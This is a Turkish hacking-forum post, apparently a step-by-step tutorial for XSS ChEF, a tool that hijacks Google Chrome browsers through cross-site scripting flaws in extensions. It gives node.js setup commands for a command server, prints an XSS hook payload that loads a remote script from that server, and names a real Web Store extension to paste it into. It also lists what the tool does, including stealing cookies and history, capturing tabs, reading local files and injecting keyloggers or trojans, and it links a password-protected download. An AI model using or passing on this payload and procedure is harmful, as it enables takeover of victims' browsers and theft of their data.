Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
XSS ChEF Ile Google Chrome Tarayici Hack
#1
Chrome Eklenti Zaafi Ile Bir Sisteme Sizmak adli makalemde anlattigim hususun devami niteliginde olan bu makalede de XSS ChEF adli uygulamayi tanitacagim.

XSS ile neler yapilabilir dedigimde bircok kisi Cookie calinir, sniffer kurulur diyor. Biraz daha bilgili arastirmaya merakli olanlari ise BeEF kurulur XSS Harverster ile keylogger yapilir diyor. Ancak yeni nesil XSS saldirilari artik daha olumcul hale geldi ve bilindigi gibi web sayfalari uzerinde olusmuyor.

Google Chrome eklentilerini birer web sayfasi gibi dusunebilirsiniz. Onlarin da aciklari olabiliyor ancak bir fark var; Bunlarda buldugunuz aciklar ile sayfaya degil kisinin tarayicisina hukmedebilirsiniz. XSS ChEF uygulamasi da tam bu noktada yardimimiza yetisiyor ve bize XSS’in ne kadar onemli bir zaaf oldugunu gosteriyor.

XSS ChEF Ile Neler Yapilabilir ?
1) Chrome Sekmelerinde Tam Kontrol Elde Edilir
2) Chrome Cerezlerde Duzenleme Yapilir
3) Chrome Proxy ayarlari degistirilir
4) Sık Kullanilanlar kontrol edilir
5) Tarayicida acik olan butun sekmelerin ekran goruntuleri alinir
6) Tarayici gecmisi calinir
7) Yerel dosya sistemine sizilir
8) Sisteme keylogger, trojan vs. gibi zararlilar enjekte edilir
9) BeEF Exploit Framework ile senkronize edilir ve onun butun ozellikleri de kullanilabilir.
10) Tarayici tamamen kapatilmadan baglanti kapanmaz


Sadece bu maddeleri okumak bile isin meraklilarini heycanlandirmistir. Simdi bu guzel uygulamanin nasil kurulacagina gecelim.

XSS ChEF Kurulumu

Uygulamanin 3 cesit baglanti ozelligi var: PHP/XHR, PHP/WebSockets ve node.js/WebSockets. Ben bunlar icerisinden node.js/WebSockets olanini kullanacagim. Digerleri ile ilgili kurulumlari da webde arastirarak yabanci kaynaklarda bulabilirsiniz.

1) Oncelikle XSS ChEF dosyalarini asagida verecegim linkten indirip sunucunuza atin. (Sunucunuzda 8080 numarali portun acik olmasi gerekmektedir.)

2) Daha sonra sunucunuza ssh ile baglanin ve asagidaki komutlari sirasiyla yazarak Nodejs uygulamasini yukleyin:


Kod:
wget http://nodejs.org/dist/v0.8.14/node-v0.8.14-linux-x86.tar.gz

tar -zxvf node-v0.8.14-linux-x86.tar.gz

cd node

./configure

make (Bu islem biraz uzun surebilir)

make install

npm install websocket

npm install node-static


3) Yukleme islemi basariyla tamamlandiysa, asagidaki komutu girerek serveri baslatin:

Kod:
cd /var/www/xsschef (XSS ChEF dizininin bulundugu yere gecin)

node server.js 8080 2>log.txt

4) Chrome’dan farkli bir tarayicida XSS ChEF konsoluna erisin. (127.0.0.1:8080)

www.deccal.org


5) Acilan konsol sayfasinda “Get hook code” butonuna tiklayarak XSS ile kullanacagimiz baglanti kodunu goreceksiniz. Bu kodu kopyalayin.[/color]

Kod:
<img src=x onerror=”if(location.protocol.indexOf(’chrome’)==0){d=document;e=createElement(’script’);e.src= “127.0.0.1:8080/hook ;d.bOdy”>

6) Daha sonra XSS acigi olan bir Google Chrome eklentisi bulmaniz gerekiyor. Merak etmeyin size bir tane deneme icin verecegim.

PHP Kod:
https://chrome.google.com/webstore/detail/springpad-extension/njhgeimnepehieioinbhmfpphfoocmng 
Buradaki linkten uygulamayi Google Chrome’a ekleyin. (156.220 kisi indirmis)

7) Tarayicinin sag ust kosesine eklenti simgesi gelecektir. Bu simgeye tikladiginizda karsiniza kullanici adi ve sifre girebileceginiz bir kutucuk cikacaktir. Buraya kullanici adina kopyaladiginiz XSS baglanti kodunu yapistirin ve girin.

www.deccal.org


8) Butun ayarlari dogru yaptiysaniz baglanti kurulmustur. Diger tarayicida acik olan XSS ChEF konsola gelin ve sol ustteki aktif baglantilarin oldugu butona tiklayin.
www.deccal.org


9) Burada karsiniza cikacak pencerede XSS aginiza dusmus baglantilardan birine tiklayin ve artik o tarayici sizin emrinizde.

Kurulumu ve baslangici bu sekilde bitirmis olduk. Uygulamanin geri kalan ozelliklerini de asagida hazirladigim videodan izleyebilirsiniz.



XSS ChEF Download Linki:

RAR Sifresi: SOLVER

Video Download Linki
Beğenenler:
#2
Ellerine sağlık güzel bir konu. Bu tip şeyler her yerde yok.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Yeni Kolay Site Hack :) ByMuh4mm3d 204 5,483 07-12-2016, Saat: 18:34
Son Yorum: J3adJ3oy
  IP Kamera ve Modem Hack (Resimli Anlatım) Mr.Coward 199 4,569 20-11-2016, Saat: 03:43
Son Yorum: Raporsuz
  Android İle Site Hack | Muhteşem Özellikler ERTUĞRUL 65 1,751 17-11-2016, Saat: 16:17
Son Yorum: berat00
  Web Hack İlerlemek İsteyenler... CyberTürk 20 652 14-11-2016, Saat: 21:05
Son Yorum: JoseQual
  Facebook Hack Açığı Ekim 2016 Güncel - %100 Kesin Sonuç MilesHatz 1 205 07-10-2016, Saat: 18:18
Son Yorum: Rıdvan98
Anahtar Kelimeler

XSS ChEF Ile Google Chrome Tarayici Hack indir, XSS ChEF Ile Google Chrome Tarayici Hack Videosu, XSS ChEF Ile Google Chrome Tarayici Hack Online izle, XSS ChEF Ile Google Chrome Tarayici Hack Bedava indir, XSS ChEF Ile Google Chrome Tarayici Hack Yükle, XSS ChEF Ile Google Chrome Tarayici Hack Hakkında, XSS ChEF Ile Google Chrome Tarayici Hack Nedir, XSS ChEF Ile Google Chrome Tarayici Hack Free indir, XSS ChEF Ile Google Chrome Tarayici Hack Oyunu, XSS ChEF Ile Google Chrome Tarayici Hack Download


1 Ziyaretçi